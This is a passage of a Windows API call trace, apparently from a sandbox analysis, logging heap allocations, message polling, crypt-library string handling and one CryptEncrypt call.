wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0136.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0136.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.423] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0136.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0136.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50cb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0136.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54288 [0136.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0136.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0136.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0136.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0136.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0136.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0136.428] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ec3830*, pdwDataLen=0x8cef60*=0x166f2, dwBufLen=0x166f8 | out: pbData=0x2ec3830*, pdwDataLen=0x8cef60*=0x166f8) returned 1 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0136.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0136.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0136.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0136.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0136.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0136.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0136.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0136.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0136.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0136.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0136.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0136.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0136.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0136.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0136.440] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0136.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0136.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0136.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0136.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0136.441] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0136.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0136.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0136.441] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0136.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0136.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0136.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0136.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0136.441] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0136.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0136.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0136.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0136.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0136.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0136.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0136.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0136.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0136.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0136.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0136.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0136.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0136.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0136.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0136.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0136.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0136.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0136.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0136.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0136.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0136.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0136.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0136.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0136.443] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0136.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0136.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0136.443] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0136.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0136.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0136.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0136.443] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0136.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0136.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0136.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0136.443] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0136.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0136.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0136.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0136.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0136.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0136.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0136.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0136.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0136.444] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0136.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0136.444] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0136.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0136.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0136.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0136.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0136.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0136.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0136.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0136.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0136.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0136.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f8) returned 0x2ed9f30 [0136.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0136.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0136.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f8) returned 0x2f06d30 [0136.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0136.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0136.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed9f30 | out: hHeap=0x970000) returned 1 [0136.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0136.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0136.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0136.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f8) returned 0x2ed9f30 [0136.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f06d30 | out: hHeap=0x970000) returned 1 [0136.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0136.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f8) returned 0x2f06d30 [0136.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed9f30 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0136.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0136.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec3830 | out: hHeap=0x970000) returned 1 [0136.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0136.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0136.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0136.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0136.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0136.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0136.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0136.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0136.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0136.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0136.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0136.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: 